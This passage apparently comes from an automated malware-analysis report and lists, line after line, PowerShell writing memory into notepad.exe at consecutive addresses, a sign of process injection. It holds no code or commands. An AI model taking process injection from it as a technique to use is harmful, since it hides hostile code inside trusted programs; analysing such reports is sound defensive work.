              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5001AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5001BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5001CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5001DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5001EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5001FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50020Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50021Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50022Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50023Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50024Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50025Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50026Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50027Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50028Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50029Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5002AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5002BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5002CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5002DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5002EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5002FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50030Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50031Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50032Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50033Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50034Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50035Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50036Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50037Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50038Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50039Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5003AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5003BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5003CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5003DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5003EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5003FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50040Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50041Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50042Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50043Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50044Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50045Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50046Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50047Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50048Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50049Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5004AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5004BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5004CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5004DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5004EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5004FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50050Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50051Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50052Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50053Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50054Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50055Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50056Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50057Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50058Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50059Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5005AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5005BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5005CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5005DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5005EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5005FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50060Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50061Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50062Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50063Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50064Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50065Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50066Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50067Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50068Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50069Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5006AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5006BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5006CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5006DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5006EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5006FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50070Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50071Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50072Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50073Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50074Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50075Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50076Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50077Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50078Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50079Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5007AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5007BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5007CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5007DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5007EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5007FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50080Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50081Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50082Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50083Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50084Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50085Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50086Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50087Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50088Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50089Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5008AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5008BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5008CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5008DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5008EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5008FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50090Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50091Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50092Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50093Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50094Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50095Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50096Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50097Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50098Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50099Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5009AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5009BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5009CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5009DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5009EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5009FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500A9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500AAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500ABJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500ACJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500ADJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500AEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500AFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500B9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500BAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500BBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500BCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500BDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500BEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500BFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500C9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500CBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E0Jump to behavior
